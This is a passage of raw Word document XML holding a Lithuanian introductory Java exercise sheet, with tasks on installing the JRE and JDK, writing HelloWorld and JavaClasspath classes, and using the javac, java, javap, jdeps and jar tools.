          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>okymosi rezultatas. Naudoti pasirinktos programavimo</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> kalbos įrankius ir sintaksę.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc517082416"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. WINDOWS, MAC ARBA LINUX OPERACINĖJE SISTEMOJE ĮSIDIEKITE JRE (JAVA RUNTIME ENVIRONMENT)</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sukonfigūruokite JRE. Patikrinkite ar operacinėje sistemoje veikia Java programų paleidimo įrankis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc1738659749"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. WINDOWS, MAC ARBA LINUX OPERACINĖJE SISTEMOJE ĮSIDIEKITE JDK (JAVA  DEVELOPMENT KIT)</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">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Sukonfigūruokite JDK . Patikrinkite ar operacinėje sistemoje veikia JAVA programų surinkimo įrankis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc512268547"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. NAUDOJANT TEKSTINĮ  REDAKTORIŲ (PAVYZDŽIUI: NOTEPAD++) SUKURKITE JAVA PROJEKTĄ SU V</w:t>
      </w:r>
      <w:r w:rsidR="006F1D2F" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IENA JAVA KLASE HELLOWORLD.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">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 Klasė turi būti patalpinta į Java paketą com.oracle.javabasics. Klasės HelloWorld turinys:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>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HelloWorld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Hello World! (Text edit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color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc292664311"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>4 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. NAUDOJANT INTEGRUOTĄ KŪRIMO APLINKĄ (PAVYZDŽIUI: ECLIPSE) SUKURKITE JAVA PROJEKTĄ SU VI</w:t>
      </w:r>
      <w:r w:rsidR="006F1D2F" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ENA JAVA KLASE HELLOWORLD.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">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Klasė turi būti patalpinta į Java paketą com.oracle.javabasics. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Klasės HelloWorld turinys:</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HelloWorld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Hello World! (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color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc484219219"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>5 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. NAUDOJANT JAVA KOMANDINĖS EILUTĖS ĮRANKIUS JAVAC IR JAVA, SURINKITE IR PALEISKITE </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 užduotyje </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PARAŠYTĄ HELLOWORLD PROGRAMĄ</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">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 xml:space="preserve"> Darbas vykdomas operacinės sistemos komandinėje eilutėje</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidR="008A4AC9">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc1752878904"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>6 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. NAUDOJANT JAVA KOMANDINĖS EILUTĖS ĮRANKIUS JDEPS IR JAVAP, PATIKRINKITE </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3 užduotyje</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PARAŠYTOS HELLOWORLD PROGRAMOS PRIKLAUSOMYBES IR PAŽIŪRĖKITE PROGRAMOS</w:t>
      </w:r>
      <w:r w:rsidR="00B74FC9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>BYTE” KODĄ</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">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Darbas vykdomas operacinės sistemos komandinėje eilutėje</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidR="008A4AC9">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc1052936877"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>7 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. NAUDOJANT JAVA KOMANDINĖS EILUTĖS ĮRANKĮ JAR SUKURKITE </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">3 užduotyje </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PARAŠYTOS HELLOWORLD PROGRAMOS PALEIDŽIAMĄ ARCHYVĄ</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">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 Darbas vykdomas operacinės sistemos komandinėje eilutėje</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidR="008A4AC9">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc2123721355"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>8 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. NAUDOJANT TEKSTINĮ  REDAKTORIŲ SUKURKITE JAVA PROJEKTĄ SU VIEN</w:t>
      </w:r>
      <w:r w:rsidR="006F1D2F" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>A JAVA KLASE JAVACLASSPATH.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">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Klasė turi būti patalpinta į Java paketą com.javabasics. Klasės JavaClasspath turinys:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>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bookmarkStart w:id="45" w:name="_Toc746293351"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>package com.javabasics;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>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bookmarkStart w:id="46" w:name="_Toc810622965"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>public class JavaClasspath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Hello World! (Text edit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rFonts w:eastAsia="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc963771081"/>
      <w:bookmarkStart w:id="48" w:name="_Toc1627339787"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Surinkite klasę ir naudojant Java Classpath parametrą pabandykite paleisti surinktą klasę</w:t>
      </w:r>
      <w:bookmarkStart w:id="49" w:name="_Toc740327039"/>
      <w:bookmarkEnd w:id="47"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidR="008A4AC9">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>9 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAV</w:t>
      </w:r>
      <w:r w:rsidR="001463E3" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>A KLASĘ VARDU JAVAELEMENTS.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Klasė turi būti patalpinta į paketą vardu javabasics. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Sukurtoje klasėje turi būti aprašytos dvi paprogramės (Methods) main ir printAll. Taip pat klasėje turi būti sukurti: lokali konstanta, objekto kintamasis, statinis klasės kintamasis, metodo kintamasis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidR="008A4AC9">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkStart w:id="50" w:name="_Toc368749838"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>10 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. PAPILDYKITE JAVAELEMENTS </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>9 užduotyje</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PROGRAMĄ KODO KOMENTARA</w:t>
      </w:r>
      <w:r w:rsidR="00CF299A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IS</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Turi būti panaudoti vie</w:t>
      </w:r>
      <w:r w:rsidR="00B74FC9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>nos ir kelių eilučių komentarai,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> k</w:t>
      </w:r>
      <w:r w:rsidR="00B74FC9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>omentarai turi būti prasmingi. P</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>apildomai parašykite JavaDoc tipo komentarą paprogramei printAll</w:t>
      </w:r>
      <w:bookmarkStart w:id="51" w:name="_Toc1704684133"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidR="00577F29">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="005D3AE2" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A16389" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis</w:t>
      </w:r>
      <w:r w:rsidR="00A16389" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VARDU JAVAEXPR</w:t>
      </w:r>
      <w:r w:rsidR="001463E3" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ESSIONSSTATEMENTSVARIABLES.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A16389" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Klasė turi būti patalpi</w:t>
      </w:r>
      <w:r w:rsidR="00B74FC9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>nta į paketą vardu javabasics. D</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>arbą galite atlikti tekstiniame redaktoriuje arba IDE. Sukurtoje klasėje turi būti aprašyti: du Java reiškiniai (Expressions), du sakiniai (Statements) ir du kintamieji (Variables). Pavadinimams turi būti panaudoti teisingi identifikatoriai (Identifiers)</w:t>
      </w:r>
      <w:bookmarkStart w:id="52" w:name="_Toc826976658"/>
      <w:bookmarkEnd w:id="51"/>
